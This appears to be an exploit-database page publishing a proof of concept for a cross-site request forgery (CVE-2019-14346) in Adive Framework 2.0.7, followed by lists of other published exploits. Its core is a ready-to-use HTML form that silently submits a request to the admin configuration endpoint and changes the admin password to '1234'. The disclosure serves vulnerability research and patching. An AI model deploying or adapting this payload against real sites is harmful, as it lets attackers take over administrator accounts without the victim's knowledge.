Menu

Search for hundreds of thousands of exploits

"Adive Framework 2.0.7 - Cross-Site Request Forgery"

Author

Exploit author

"Pablo Santiago"

Platform

Exploit platform

php

Release date

Exploit published date

2019-08-08

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
# Date:02/08/2019.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://adive.es
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows and Kali linux
# CVE :2019-14346

# 1. Technical Description:
# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
#Request Forgery vulnerability, an attacker could change any user
password.

# 2. Proof Of Concept (CODE):

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/adive/admin/config" method="POST">
      <input type="hidden" name="userName" value="admin" />
      <input type="hidden" name="confPermissions" value="1" />
      <input type="hidden" name="pass" value="1234" />
      <input type="hidden" name="cpass" value="1234" />
      <input type="hidden" name="invokeType" value="web" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# 3. References:
# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
# https://imgur.com/apuZa9q
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-18 "TemaTres 3.0 - 'value' Persistent Cross-site Scripting" webapps php "Pablo Santiago"
2019-11-18 "TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)" webapps php "Pablo Santiago"
2019-11-14 "oXygen XML Editor 21.1.1 - XML External Entity Injection" local windows "Pablo Santiago"
2019-11-12 "Joomla 3.9.13 - 'Host' Header Injection" webapps php "Pablo Santiago"
2019-11-08 "Adive Framework 2.0.7 - Privilege Escalation" webapps php "Pablo Santiago"
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.